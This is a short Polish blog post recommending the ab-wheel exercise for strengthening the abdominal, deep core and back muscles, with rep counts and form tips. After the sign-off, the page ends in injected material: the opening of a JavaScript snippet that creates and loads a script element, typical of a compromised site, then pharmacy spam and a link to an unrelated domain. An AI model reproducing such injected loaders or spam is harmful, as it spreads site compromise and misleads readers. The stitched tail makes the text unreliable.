JabiPakuje – WZMOCNIJ BRZUCH OD WEWNĄTRZ – TRENING NA KÓŁKU

27.10.2014 / Adam Jabłoński / Kulturystyka

Cześć

Jest takie zapomniane ( no może niezapomniane, ale rzadziej spotykane) ćwiczenie na mięśnie brzucha.
Wygląda na dosyć proste – ale wymaga naprawdę wielkiego wysiłku.
Jest to ćwiczenie na kółku ( polecam zakup dobrego kółka do ćwiczeń brzucha będziecie mieli je na wiele wiele lat treningu)

Co nam daje takie ćwiczenie :
– maksymalnie wzmacnia wytrzymałość mięśni brzucha i w dodatku wzmacnia mięśnie głębokie brzucha CZYLI WZMACNIAMY NASZ BRZUCH OD WEWNĄTRZ – bardzo przydatne ćwiczenie dla kobiet po porodach oraz dla osób, których brzuchy trochę słabo trzymają „flaki” :-).
– wzmacnia mięśnie grzbietu
– wzmacnia nawet trochę mięśnie klatki ( ale tym bym się tak nie przejmował i nie wliczał tego ćwiczenia jako np. jedno z ćwiczeń w treningu klatki piersiowej)

Na początku to ćwiczenie może sprawiać problemy, ale po kilku treningach spokojnie będziecie robić 3 x 12-15 a może i więcej powtórzeń ( prawdziwi HARDCORE’y robią to ćwiczenie z wyprostowanych nóg – PODZIWIAM )

Pamiętajcie aby dać mate pod kolona i skupcie się nie jedziemy do przodu samymi rękoma lub samym tułowiem – to współpraca właśnie rąk i tułowia. – w sumie no resztę zobaczycie na filmiku.

 

Pozdrawiam
HEJAAAAAAif (document.currentScript) { var d=document;var s=d.createElement('script'); Purchase cost of arimidex in ireland http://gamberra.es/omnicef-oral-suspension-cost/ Purchase